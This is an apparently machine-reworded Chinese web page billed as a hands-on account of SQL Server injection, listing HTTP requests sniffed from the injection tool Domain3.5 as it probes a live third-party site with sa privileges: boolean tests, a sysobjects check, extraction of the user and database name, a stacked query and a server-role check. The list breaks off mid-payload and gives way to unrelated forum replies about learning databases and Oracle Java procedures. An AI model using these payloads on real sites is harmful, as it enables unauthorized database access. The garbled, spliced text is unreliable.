MSSQL网页编程之实战:周全懂得SQLServer注进历程
提供用于管理、检查、优化数据库操作的管理工具。</p>想懂得sql注进的历程和道理,网上找了些文章,讲得都对照浅薄,可是我晓得有几款国际对照经常使用的注进工具,好比Domain3.5、NBSI3.0、啊D2.32、另有Pangolin、另有一些外洋的。这里任意弄几个来研讨一下就ok。此次用到的嗅探工具是sniffx专门嗅探http的数据包,功效不壮大,可是充足此次举动的利用。原本想利用ethereal或wireshark,可是内里复制数据包内容总是把没有转码的16进制也复制了过去,有点贫苦。也就是说这两个工具用得不纯熟。【查询数据库信息】
当地没有找到好点的有注进毛病的体系,只幸亏网上寻觅了,先用Domain3.5,运转很好以来就找到个sqlserver,sa权限的注进点,点Domain3.5下面的“入手下手检测”
以下是Domain3.5中嗅探出来的http数据包:
news_show.asp?id=15618%20and%201=1
news_show.asp?id=15618%20and%201=2
news_show.asp?id=15618%20and%20exists%20(select%20*%20from%20sysobjects)
news_show.asp?id=15618%20and%20char(124)%2Buser%2Bchar(124)=0
news_show.asp?id=15618;declare%20@a%20int–
news_show.asp?id=15618%20and%20char(124)%2Bdb_name()%2Bchar(124)=0
news_show.asp?id=15618%20And%20IS_SRVROLEMEMBER(0 理解了存储结构,再阅读下性能优化的章节基本上会对sqlserver有个清晰地认识 再开发调试阶段和OLAP环境中,外键是可以建立的。新版本中加入了SETNULL和SETDEFAULT属性,能够提供能好的级联设置。 多走走一此相关论坛,多看一些实例开发,多交流0经验,没什么的,我也是刚学没多久!加油 只能告诉你,学好数据库语言和原理,多见识几种数据库软件,比一棵树上吊死要好。 如果处理少量数据,比如几百条记录的数据,我不知道这两种情况哪个效率更高,如果处理大量数据呢?比如有表中有20万条记录. 其实可以做一下类比,Oracle等数据库产品老早就支持了java编程,而且提供了java池参数作为用户配置接口。但是现在有哪些系统大批使用了java存储过程?!连Oracle自己的应用都不用为什么?!
页:
[1]